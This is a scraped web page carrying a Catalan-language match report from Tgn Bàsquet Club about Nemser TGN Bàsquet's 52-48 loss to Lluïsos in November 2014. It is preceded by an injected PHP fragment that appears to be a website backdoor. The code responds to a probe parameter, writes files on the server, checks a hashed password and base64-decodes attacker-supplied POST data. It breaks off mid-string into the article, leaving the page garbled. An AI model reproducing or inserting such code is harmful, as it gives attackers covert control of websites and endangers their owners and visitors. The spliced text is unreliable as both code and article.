function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser TGN Bàsquet encaixa un parcial de 27-7 en l'últim quart i perd contra el Lluïsos (52-48) - Tgn Bàsquet Club -

El Nemser TGN Bàsquet encaixa un parcial de 27-7 en l’últim quart i perd contra el Lluïsos (52-48)

Updated: novembre 23, 2014

El Nemser TGN Bàsquet va deixar escapar una victòria que tenia a les mans i va registrar una nova derrota fora del pavelló del Sagrat Cor. L’equip lila va encaixar un parcial de 27-7 en els últims deu minuts de partit i va cedir el triomf en un quart de desconcert total per part del conjunt visitant. Fins aleshores, el Nemser TGN Bàsquet va dominar el matx. Després d’una bona sortida, l’equip que entrena Jordi Hernández va arribar al descans amb un avantatge prou còmode, de 15 punts (14-29) que feia presagiar una segona meitat plàcida. En certa manera, així va ser. El tercer quart, tot i que va mostrar una certa igualtat entre els dos equips, permetia les tarragonines mantenir i, fins i tot, ampliar una mica el seu avantatge i arribar, d’aquesta manera, a l’últim quart amb una diferència que semblava suficient. Malgrat tot, el Nemser TGN Bàsquet es va col·lapsar completament en el tram final. Les visitants van perdre un munt de pilotes que van provocar contraatacs rivals per anotar fàcilment. El Lluïsos va tancar molt bé el rebot defensiu i això li va permetre córrer en transició ofensiva mentre el conjunt lila semblava haver perdut el nord. Farré, que va jugar els seus primers minuts amb el Nemser TGN Bàsquet, va patir la rigorositat arbitral quan intentava guanyar la posició al pal baix i l’equip fallava nombrosos tirs lliures. En ple desconcert visitant, el Lluïsos, pletòric d’encert, va anar retallant diferències i es va posar per davant en el resultat a un minut pel final del matx.

Amb aquesta derrota, el Nemser TGN Bàsquet encadena dues desfetes seguides i només ha guanyat un matx (Olesa) lluny de la seva pista.